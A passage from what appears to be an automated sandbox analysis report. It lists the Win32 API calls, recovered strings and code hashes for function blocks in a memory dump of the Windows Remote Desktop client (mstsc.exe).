                                                                                                                                                                                        • DrawTextW.USER32(00000000,?,000000FF,?,00000410), ref: 009071FA
                                                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0090720F
                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0090721B
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Object$Select$ClientCompatibleCreateDeleteDrawItemMessageRectSendText
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3306118528-0
                                                                                                                                                                                        • Opcode ID: 250ea636f1cc38931695c2911aa55607a8ee89664a8352584cd4aeb3834189dc
                                                                                                                                                                                        • Instruction ID: cfb3901a6a57d4082f7a9e1d6a64138c36a1224aaf9e9d0123e5a0ac67a2151f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 250ea636f1cc38931695c2911aa55607a8ee89664a8352584cd4aeb3834189dc
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A416E72908309AFDB148FE9DC88EAEBBB9FB49310F144519F911B32A1C630AD50DF61
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000141,000000FF,00000000), ref: 008F2B0E
                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000144,00000000,00000000), ref: 008F2B22
                                                                                                                                                                                        • wcsncmp.MSVCRT ref: 008F2B40
                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000040B,00000000,?), ref: 008F2B67
                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 008F2BB9
                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 008F2BC8
                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000040E,00000000,00000001), ref: 008F2BD3
                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 008F2BDD
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageSend$wcsncmp
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2995519212-0
                                                                                                                                                                                        • Opcode ID: 91d31364ea553ae42b83bf36cbe58c0188267d90edf7b886709b77dd46f6818a
                                                                                                                                                                                        • Instruction ID: 56a9b5dcf16a0bda5b1caad9575fc78247ad582c930ffed9545cd99e810dd3e0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 91d31364ea553ae42b83bf36cbe58c0188267d90edf7b886709b77dd46f6818a
                                                                                                                                                                                        • Instruction Fuzzy Hash: D221CEB1A4070CBAE725AEB98C86FBA776CFF45768F100160FB10E61D1C6B49D418A69
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 009093F2
                                                                                                                                                                                        • GetDlgItem.USER32(?,00001396), ref: 00909408
                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00909413
                                                                                                                                                                                        • GetDlgItem.USER32(?,00001397), ref: 00909436
                                                                                                                                                                                        • GetWindowRect.USER32(00000000,00000000), ref: 00909441
                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0090946F
                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000041F,00000000), ref: 009094A2
                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,?,00909ADF,?,?,00000004), ref: 009094CE
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Window$ItemRect$ClientLongMessageScreenSend
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 425840078-0
                                                                                                                                                                                        • Opcode ID: 9dae657c7633c033306be657e32b6062d81b2e38a9f8e4097bb27f30852a07e1
                                                                                                                                                                                        • Instruction ID: b0bc0d473184d0af6ad194116b39cfcc677787c20ec1cc19c764855d950b6ff5
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9dae657c7633c033306be657e32b6062d81b2e38a9f8e4097bb27f30852a07e1
                                                                                                                                                                                        • Instruction Fuzzy Hash: 55314AB1A1052AAFCB14CFA8DD49ABEBBB9FB04701F004215F915FA1A2C770A911DF90
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 008E1745: lstrcmpiW.KERNEL32(?,008E2930,?,00000001,008E1934,?,00000000,00000000,00000000,?,00000000,008E2930,00000001,008E2930,?,008E2930), ref: 008E17B5
                                                                                                                                                                                        • CharNextW.USER32(00000000), ref: 008E19F8
                                                                                                                                                                                        • CharNextW.USER32(00000000), ref: 008E1A13
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CharNext$lstrcmpi
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3586774192-0
                                                                                                                                                                                        • Opcode ID: 82e43a859d2e176768d9e91b716ef6b9999468ff324c42452bf8c9f13a500d56
                                                                                                                                                                                        • Instruction ID: 738e39aba605088b0764ce97a7e9b9c8b33423021005fd628ab82aaf4b7dd116
                                                                                                                                                                                        • Opcode Fuzzy Hash: 82e43a859d2e176768d9e91b716ef6b9999468ff324c42452bf8c9f13a500d56
                                                                                                                                                                                        • Instruction Fuzzy Hash: BBA1A471A002689ADF249B2ACCCDAE9B7B5FB66700F1501AAE609D7241E7709EC1CF51
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,00000000,00000000,?), ref: 00922B1A
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00922BFC
                                                                                                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?), ref: 00922C59
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00922D0B
                                                                                                                                                                                          • Part of subcall function 00934E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0093A020,00000000,00000000,00000000), ref: 00934E6E
                                                                                                                                                                                          • Part of subcall function 008DF9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,008D1728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,008DFBF2,008E396B), ref: 008DFA1C
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00922D18
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Local$AllocFreeMessageTrace$ActivityControlEventmemcpy
                                                                                                                                                                                        • String ID: RecordToString failed$ppwszSettingsStore
                                                                                                                                                                                        • API String ID: 3157406721-3595829931
                                                                                                                                                                                        • Opcode ID: 3b4861a667b46c49987817081ee0674c6ac2bf7d68e0f70dcbdfbe6649e82a3d
                                                                                                                                                                                        • Instruction ID: c31fc370cfb4c0cd8747781bec37b818c4f66266399b342911b106c163cfab45
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b4861a667b46c49987817081ee0674c6ac2bf7d68e0f70dcbdfbe6649e82a3d
                                                                                                                                                                                        • Instruction Fuzzy Hash: B991BD71608352AFC729CF18E845B2A7BE5BB89314F10486EF984DB2A6C774DC44DF92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Dialog
                                                                                                                                                                                        • String ID: OnClickOkButton failed!$OnClickOkButton failed!. Closing the dialog.$TscProxyLinkDelSavedCreds$TscProxyLinkEditSavedCreds
                                                                                                                                                                                        • API String ID: 1120787796-1241226549
                                                                                                                                                                                        • Opcode ID: aee67aeade814f930496ee9003c788a04867e35c8bac745f5c3c2d2c9271e63f
                                                                                                                                                                                        • Instruction ID: b363015106a7e0cf541567978c6069aa01e3899715466148ce5fd08ba6922db2
                                                                                                                                                                                        • Opcode Fuzzy Hash: aee67aeade814f930496ee9003c788a04867e35c8bac745f5c3c2d2c9271e63f
                                                                                                                                                                                        • Instruction Fuzzy Hash: D75159B120020AAFDB299F18CC45B7AB75AFF84710F048619F945CB2E1DB35DD41DB91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 008E2A70
                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 008E2AEE
                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 008E2B33
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Module$FileHandleNamememcpy_s
                                                                                                                                                                                        • String ID: Module$Module_Raw$REGISTRY
                                                                                                                                                                                        • API String ID: 3152089617-549000027
                                                                                                                                                                                        • Opcode ID: 528091ae7ee9145689e0f0302058277be5ef068464d864ce1f975dfbf6d18efe
                                                                                                                                                                                        • Instruction ID: 9fe4294ea026813ce6c479921cbdab5c6634b9c2819f37d028cd073f5cb0b939
                                                                                                                                                                                        • Opcode Fuzzy Hash: 528091ae7ee9145689e0f0302058277be5ef068464d864ce1f975dfbf6d18efe
                                                                                                                                                                                        • Instruction Fuzzy Hash: D4519132A0066896DB20DF5ADC85EAE73BCFF86710F1005A5E909E3651EB749E84CF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,Alternate Full Address,?), ref: 009258DC
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,008D32EC,?,?,00000000,?,Alternate Full Address,?), ref: 009259A7
                                                                                                                                                                                          • Part of subcall function 00934E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0093A020,00000000,00000000,00000000), ref: 00934E6E
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • CRdpSettingsStore::CalculateSignScopeLength failed, xrefs: 009258A9
                                                                                                                                                                                        • szSignScope, xrefs: 00925900
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Local$ActivityAllocControlEventFreeMessageTrace
                                                                                                                                                                                        • String ID: CRdpSettingsStore::CalculateSignScopeLength failed$szSignScope
                                                                                                                                                                                        • API String ID: 2525042477-3863715102
                                                                                                                                                                                        • Opcode ID: e409c4cb3f6012ce0c6da56c06ada4c81b1b5ca6fd50f4ffb55afb5107c98cd6
                                                                                                                                                                                        • Instruction ID: fd704a640dcd0c568c6330d6c1598e78da5fca6dbe3eb3993c2d6222b4f6d828
                                                                                                                                                                                        • Opcode Fuzzy Hash: e409c4cb3f6012ce0c6da56c06ada4c81b1b5ca6fd50f4ffb55afb5107c98cd6
                                                                                                                                                                                        • Instruction Fuzzy Hash: 58410439610710EFCB299F58E949B2A7BA9FF45320F564069F844EB369D630DC80DF91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • wcstok_s.MSVCRT ref: 00926295
                                                                                                                                                                                        • wcstok_s.MSVCRT ref: 009262D7
                                                                                                                                                                                          • Part of subcall function 00934E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0093A020,00000000,00000000,00000000), ref: 00934E6E
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: wcstok_s$ActivityControlEvent
                                                                                                                                                                                        • String ID: Field in SignScope not found in store$RecordToString failed$SignScope$SignScope field not found in store
                                                                                                                                                                                        • API String ID: 684669608-1973409768
                                                                                                                                                                                        • Opcode ID: d74b8ccebfde79fd45a98809c753b8d89c85133f4b4e08451671cc4a2bebcd80
                                                                                                                                                                                        • Instruction ID: b2fe0792644b7fb4e35db081b146e54abfde903bcdbff0842bf06e5450869960
                                                                                                                                                                                        • Opcode Fuzzy Hash: d74b8ccebfde79fd45a98809c753b8d89c85133f4b4e08451671cc4a2bebcd80
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A415931608324ABDB29DF54F989FAA7BE9EF41318F040059FD82D7695CA74DD00CBA1
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008F11A4
                                                                                                                                                                                        • memset.MSVCRT ref: 008F11B8
                                                                                                                                                                                        • SendMessageW.USER32(?,0000104B,00000000,?), ref: 008F11DB
                                                                                                                                                                                        • lstrcmpiW.KERNEL32(00000000,00000000,?,?,?), ref: 008F11EF
                                                                                                                                                                                        • SendMessageW.USER32(?,00001008,00000400,00000000), ref: 008F1257
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?), ref: 008F1299
                                                                                                                                                                                        • SendMessageW.USER32(?,00001008,00000400,00000000), ref: 008F12B0
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageSend$FreeLocallstrcmpimemset
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2915578346-0
                                                                                                                                                                                        • Opcode ID: 33f815a53aae140e888e5adac8b791d06f3d50cedd5c0a4be175c8482d5d8548
                                                                                                                                                                                        • Instruction ID: 3eb510f9a586606a0cb4465b3d1ddf4c58759297759531ed9c8410da6bedf947
                                                                                                                                                                                        • Opcode Fuzzy Hash: 33f815a53aae140e888e5adac8b791d06f3d50cedd5c0a4be175c8482d5d8548
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B417C71A00318EFDF25DBA9DC88FAE7BB9FB08701F100055F600E61A1C775D9909B55
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 0093317C
                                                                                                                                                                                        • GetDlgItem.USER32(?,00003308), ref: 0093318D
                                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00933194
                                                                                                                                                                                        • GetDlgItemTextW.USER32(?,00003308,?,00000200,?,?,?), ref: 009331F5
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?), ref: 009331FF
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Item$AddressEnabledErrorFreeHandleLastLibraryMessageModuleProcTextTraceWindowmemset
                                                                                                                                                                                        • String ID: GetDlgItemText failed!
                                                                                                                                                                                        • API String ID: 3178783252-949728555
                                                                                                                                                                                        • Opcode ID: 6da2d877820d7a34b5d47bdd97e4babf2014bff834df9a9372978aee74704bfb
                                                                                                                                                                                        • Instruction ID: cef5313d359d278286dc1dfa8955045fe34a5d084e22e21824ae92f0bdf14f21
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6da2d877820d7a34b5d47bdd97e4babf2014bff834df9a9372978aee74704bfb
                                                                                                                                                                                        • Instruction Fuzzy Hash: E931E131644310ABCB24CFA5CD49F5A7BA9FF06300F018099F954EB262DB30DE409F95
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 00935A19
                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000208,0093A020), ref: 00935A82
                                                                                                                                                                                        • UnregisterClassW.USER32(?,00000000), ref: 00935A90
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00935A9A
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • PAL_SYS_WIN32_TIMER_WNDCLASS, xrefs: 00935A26
                                                                                                                                                                                        • Failed to get module specific class name, xrefs: 00935A5B
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: HandleModule$AddressClassErrorFreeLastLibraryMessageProcTraceUnregistermemset
                                                                                                                                                                                        • String ID: Failed to get module specific class name$PAL_SYS_WIN32_TIMER_WNDCLASS
                                                                                                                                                                                        • API String ID: 3271539793-2015629946
                                                                                                                                                                                        • Opcode ID: d9c3872d50e7d7b9af0ec331cf0cd162747b68a0df52f81cf343d1c47feb75f6
                                                                                                                                                                                        • Instruction ID: c1ba6be1ef299b8f05c5673bf5404b4f09c8343830b796a7872b163643748d0d
                                                                                                                                                                                        • Opcode Fuzzy Hash: d9c3872d50e7d7b9af0ec331cf0cd162747b68a0df52f81cf343d1c47feb75f6
                                                                                                                                                                                        • Instruction Fuzzy Hash: 08210B315047486BDB29EFA59C89F5F3B9DFB09310F124699F901DB292CA70DC40AF91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 00935B26
                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000208,0093A020), ref: 00935B8F
                                                                                                                                                                                        • UnregisterClassW.USER32(?,00000000), ref: 00935B9D
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00935BA7
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Failed to get module specific class name, xrefs: 00935B68
                                                                                                                                                                                        • PAL_SYS_WIN32_THREAD_WNDCLASS, xrefs: 00935B33
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: HandleModule$AddressClassErrorFreeLastLibraryMessageProcTraceUnregistermemset
                                                                                                                                                                                        • String ID: Failed to get module specific class name$PAL_SYS_WIN32_THREAD_WNDCLASS
                                                                                                                                                                                        • API String ID: 3271539793-2016134723
                                                                                                                                                                                        • Opcode ID: 812ea169b450139e62c3b01d76fffbc1ed7f53367a831162cb28dafb61a1b84e
                                                                                                                                                                                        • Instruction ID: 43afe2b5bf8e9d8809e9b6193f8b0308a58145f22a63837a2fcc50d8d8f17ffa
                                                                                                                                                                                        • Opcode Fuzzy Hash: 812ea169b450139e62c3b01d76fffbc1ed7f53367a831162cb28dafb61a1b84e
                                                                                                                                                                                        • Instruction Fuzzy Hash: A1212D329047446BDB28DF64DC49F6A77B9FB09310F160599F501DB292CE70DC409F91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,00003328,?,?,?,00906947,?,?,00906570,00003327,?,?,?,?,?), ref: 009069B5
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,00003330,?,?,?,?,00906454,00000110,?), ref: 009069C4
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,0000332F,?,?,?,?,00906454,00000110,?), ref: 009069D8
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,00003329,?,?,?,?,00906454,00000110,?), ref: 009069EC
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,0000332A,?,?,?,?,00906454,00000110,?), ref: 009069FD
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,0000332B,?,?,?,?,00906454,00000110,?), ref: 00906A0E
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,0000332C,?,?,?,?,00906454,00000110,?), ref: 00906A1F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ButtonChecked
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1719414920-0
                                                                                                                                                                                        • Opcode ID: 2360d3d6f7d1df0447911915a4ad39cd4ceaeeb508fc3266904361b4b92b5fd6
                                                                                                                                                                                        • Instruction ID: 7c523db8892679c5acc04da4901608b396bcde1965f851fa5d1e498bd989fbd3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2360d3d6f7d1df0447911915a4ad39cd4ceaeeb508fc3266904361b4b92b5fd6
                                                                                                                                                                                        • Instruction Fuzzy Hash: AC119331B40713BBEB252FA99C84B16AE6DEF04754F214134F904B50E0DBA1DE618694
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?), ref: 0091A325
                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32 ref: 0091A366
                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0091A385
                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0091A3AB
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32, xrefs: 0091A319
                                                                                                                                                                                        • mstsc.chm, xrefs: 0091A308
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                        • String ID: CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32$mstsc.chm
                                                                                                                                                                                        • API String ID: 1800380464-1505127495
                                                                                                                                                                                        • Opcode ID: c75922c693532c4a23dc676fa746a7ec040652f3c0dc2a49705601fee51fae59
                                                                                                                                                                                        • Instruction ID: e42d4d29b63f67191da2256b9c20debcd12876847fb7428626ed0561d1a61a30
                                                                                                                                                                                        • Opcode Fuzzy Hash: c75922c693532c4a23dc676fa746a7ec040652f3c0dc2a49705601fee51fae59
                                                                                                                                                                                        • Instruction Fuzzy Hash: A12160B0A0521CEFDB259F609C85FEBB7BCEB55304F1006A9B855E2140DB719E849E91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetDlgItem.USER32(?,00001397), ref: 0090A2E5
                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,0090927F), ref: 0090A2EC
                                                                                                                                                                                        • SendMessageW.USER32(?,0000041E,00000000,00000000), ref: 0090A30D
                                                                                                                                                                                        • DestroyWindow.USER32 ref: 0090A319
                                                                                                                                                                                        • CreateDialogIndirectParamW.USER32(00000110,?,?,?,?), ref: 0090A347
